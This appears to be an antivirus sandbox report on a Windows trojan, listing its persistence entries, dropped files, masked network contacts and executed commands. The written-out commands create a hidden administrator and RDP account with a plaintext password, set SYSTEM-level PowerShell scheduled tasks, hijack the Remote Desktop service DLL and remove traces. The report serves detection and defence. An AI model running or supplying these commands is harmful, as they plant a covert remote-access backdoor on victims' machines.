Technical Information
To ensure autorun and distribution
Creates or modifies the following files
- <SYSTEM32>\tasks\78530
- <SYSTEM32>\tasks\updsvc
Creates the following services
- [<HKLM>\system\currentcontrolset\services\TermService\parameters] 'ServiceDLL' = '%WINDIR%\help\hlp11.dat'
- [<HKLM>\System\CurrentControlSet\Services\TermService] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\SvcHlies33] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\SvcHlies33] 'ImagePath' = '<SYSTEM32>\rundll32.exe %WINDIR%\help\hlp12.dat, deployns '
Malicious functions
Terminates or attempts to terminate
the following system processes:
- <SYSTEM32>\cmd.exe
Modifies file system
Creates the following files
- %TEMP%\shipkat.ps1
- %TEMP%\changes_765543.txt
- %TEMP%\nsz5e06.tmp\system.dll
- %WINDIR%\help\hlp11.dat
- %WINDIR%\help\hlp12.dat
- %WINDIR%\help\hlp13.dat
- <SYSTEM32>\rfxvmt.dll
- %WINDIR%\temp\desk.txt
- <SYSTEM32>\microsoft\protect\s-1-5-20\c1a7e42b-5da5-4416-9152-70165fc7dc96
- <SYSTEM32>\microsoft\protect\s-1-5-20\preferred
- %PROGRAMDATA%\microsoft\crypto\rsa\machinekeys\f686aace6942fb7f7ceb231212eef4a4_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
- <LS_APPDATA>\microsoft\windows\<INETFILES>\content.ie5\caasbycl\loca[1].htm
Deletes the following files
- %TEMP%\nsz5e06.tmp\system.dll
- %TEMP%\changes_765543.txt
Deletes itself.
Network activity
TCP
HTTP GET requests
- http://ge#.####upportsoftware.com/location/loca.asp
UDP
- DNS ASK po###fafha.xyz
- DNS ASK le##tbe.icu
- DNS ASK ge#.####upportsoftware.com
Miscellaneous
Searches for the following windows
- ClassName: 'NSMWClass' WindowName: ''
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -f %TEMP%\shipkat.ps1
- '%WINDIR%\temp\updsvc.exe'
- '<SYSTEM32>\cmd.exe' /C powershell -ExecutionPolicy Bypass -f %TEMP%\shipkat.ps1' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C net.exe user WgaUtilAcc xT35Fk75 /add' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Remote Desktop Users" ebligsliv$ /ADD' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C net.exe user WgaUtilAcc xT35Fk75' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C schtasks /create /tn 78530 /tr "powershell -nop -ep bypass -f %WINDIR%\help\78244.ps1" /ru system /sc hourly /mo 1' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c start %WINDIR%\temp\updsvc.exe' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c schtasks /create /tn "updsvc" /tr "%WINDIR%\temp\updsvc.exe" /sc onlogon /f' (with hidden window)
Executes the following
- '<SYSTEM32>\cmd.exe' /C powershell -ExecutionPolicy Bypass -f %TEMP%\shipkat.ps1
- '<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Remote Desktop Users" ebligsliv$ /ADD
- '<SYSTEM32>\net.exe' LOCALGROUP "Remote Desktop Users" ebligsliv$ /ADD
- '<SYSTEM32>\net1.exe' LOCALGROUP "Remote Desktop Users" ebligsliv$ /ADD
- '<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
- '<SYSTEM32>\net.exe' LOCALGROUP "Administrators" WgaUtilAcc /ADD
- '<SYSTEM32>\net1.exe' LOCALGROUP "Administrators" WgaUtilAcc /ADD
- '<SYSTEM32>\cmd.exe' /C net.exe user WgaUtilAcc xT35Fk75
- '<SYSTEM32>\net1.exe' user WgaUtilAcc xT35Fk75
- '<SYSTEM32>\cmd.exe' /c schtasks /create /tn "updsvc" /tr "%WINDIR%\temp\updsvc.exe" /sc onlogon /f
- '<SYSTEM32>\cmd.exe' /C schtasks /create /tn 78530 /tr "powershell -nop -ep bypass -f %WINDIR%\help\78244.ps1" /ru system /sc hourly /mo 1
- '<SYSTEM32>\schtasks.exe' /create /tn 78530 /tr "powershell -nop -ep bypass -f %WINDIR%\help\78244.ps1" /ru system /sc hourly /mo 1
- '<SYSTEM32>\cmd.exe' /c rundll32.exe %WINDIR%\help\hlp12.dat, deployns
- '<SYSTEM32>\rundll32.exe' %WINDIR%\help\hlp12.dat, deployns
- '<SYSTEM32>\cmd.exe' <SYSTEM32>\rundll32.exe %WINDIR%\help\hlp12.dat,, deployns ns launch
- '<SYSTEM32>\rundll32.exe' %WINDIR%\help\hlp12.dat,, deployns ns launch
- '<SYSTEM32>\cmd.exe' /c start %WINDIR%\temp\updsvc.exe
- '<SYSTEM32>\net1.exe' LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
- '<SYSTEM32>\net.exe' user WgaUtilAcc xT35Fk75
- '<SYSTEM32>\net.exe' LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
- '<SYSTEM32>\icacls.exe' rfxvmt.dll /grant BUILTIN\Administrators:RX
- '<SYSTEM32>\takeown.exe' /A /F rfxvmt.dll
- '<SYSTEM32>\icacls.exe' rfxvmt.dll /inheritance:d
- '<SYSTEM32>\icacls.exe' rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
- '<SYSTEM32>\icacls.exe' rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
- '<SYSTEM32>\icacls.exe' rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
- '<SYSTEM32>\icacls.exe' rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
- '<SYSTEM32>\icacls.exe' rfxvmt.dll /remove BUILTIN\Administrators
- '<SYSTEM32>\reg.exe' ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
- '<SYSTEM32>\net1.exe' user WgaUtilAcc xT35Fk75 /add
- '<SYSTEM32>\reg.exe' add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %WINDIR%\help\hlp11.dat /f
- '<SYSTEM32>\net.exe' localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
- '<SYSTEM32>\net1.exe' localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
- '<SYSTEM32>\cmd.exe' /C net.exe user WgaUtilAcc xT35Fk75 /add
- '<SYSTEM32>\cmd.exe' /c del %temp%\*.ps1 /f
- '<SYSTEM32>\net.exe' user WgaUtilAcc xT35Fk75 /add
- '<SYSTEM32>\cmd.exe' /c del %temp%\*.txt /f
- '<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
- '<SYSTEM32>\schtasks.exe' /create /tn "updsvc" /tr "%WINDIR%\temp\updsvc.exe" /sc onlogon /f